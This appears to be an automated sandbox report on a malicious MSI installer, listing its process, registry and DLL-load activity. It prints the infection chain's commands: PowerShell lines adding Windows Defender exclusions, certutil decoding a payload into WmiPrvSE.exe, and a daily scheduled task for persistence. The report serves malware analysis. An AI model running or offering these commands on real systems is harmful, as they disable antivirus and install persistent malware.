                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3892:120:WilError_03
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF01E9F0DB4122B155.TMPJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" "
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeFile read: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.iniJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeKey opened: HKEY_USERSS-1-5-18\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 1eSOBjseu2.msiVirustotal: Detection: 32%
                Source: 1eSOBjseu2.msiReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\1eSOBjseu2.msi"
                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0985FCADD1B04D258216E8A4DAB0DBB9
                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe"
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe"
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_4A51.ps1 -paths 'C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE','C:\Users\user\AppData\Roaming\WmiPrvSE' -retry_count 10"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionExtension 'C:\Users\Public\WmiPrvSE.exe'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -decode C:\Users\Public\NDTCN1.dat C:\Users\Public\WmiPrvSE.exe
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\WmiPrvSE.exe C:\Users\Public\WmiPrvSE.exe
                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0985FCADD1B04D258216E8A4DAB0DBB9Jump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_4A51.ps1 -paths 'C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE','C:\Users\user\AppData\Roaming\WmiPrvSE' -retry_count 10"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Add-MpPreference -ExclusionExtension 'C:\Users\Public\WmiPrvSE.exe'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -decode C:\Users\Public\NDTCN1.dat C:\Users\Public\WmiPrvSE.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\WmiPrvSE.exe C:\Users\Public\WmiPrvSE.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: atlthunk.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: explorerframe.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: dxgidebug.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: propsys.dllJump to behavior
